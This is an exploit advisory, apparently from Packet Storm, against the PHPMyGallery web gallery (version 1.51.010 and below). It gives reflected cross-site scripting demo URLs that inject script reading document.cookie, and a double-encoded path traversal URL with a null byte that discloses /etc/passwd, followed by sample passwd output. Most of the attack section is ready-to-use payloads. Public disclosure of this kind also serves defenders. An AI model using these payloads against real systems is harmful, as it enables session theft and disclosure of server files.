PHPMyGallery versions 1.51.010 and below suffer from cross site scripting and local file disclosure vulnerabilities.
20d47589fda76b6266aba44c1e813c04372ac15ad0236197863aa8da862bb577
#########################################################################
# __ .__ .__ #
# |__|____ ____ |__| ______ ___________ _______|__| ____ ______ #
# | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ #
# | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ #
#/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > #
#\______| \/ \/ \/ \/ \/ \/ \/ #
# www.janissaries.org #
##=====================================================================##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Phpmygallery -Multiple Vulnerabilities All Version «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit : Phpmygallery -Multiple Vulnerabilities All Version
./WebApps URL :http://phpmygallery.kapierich.net
./WebApps Download :http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.51.010.zip
./Scripts Version : 1.51.010 & All version
./Author Exploit: [ TheMirkin ] [ th3mirkin@gmail.com ] [ All Janissaries ]
./Security Risk : [ High Level ]
./Category XPL : [ WebApps]
./Date : 21.02.2013.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#_____________________________________________________#
#[~] Xss on
# /_conf/?action=statistics&filename=[Code]
# /_conf/?action=delsettings&group=[Code]
# _conf/?action=mainsetup&group=&picdir=[Code]
###Demo Exploit
# http://www.target.com/_conf/?action=statistics&filename=2011.10"><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
# http://www.target.com/_conf/?action=delsettings&group="><script>alert(document.cookie)</script>><marquee><h1>TheMirkin</h1></marquee>
#
#_____________________________________________________#
#[~] Path Vulnerabilities ON
# /_conf/?action=delsettings&group=[Code]%2500.jpg&picdir=Sample_Gallery&what=descriptions
#
####Demo Exploit
# http://www.target.com/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg&picdir=Sample_Gallery&what=descriptions
#_____________________________________________________
# #
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
#_____________________________________________________#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx #
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
#################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed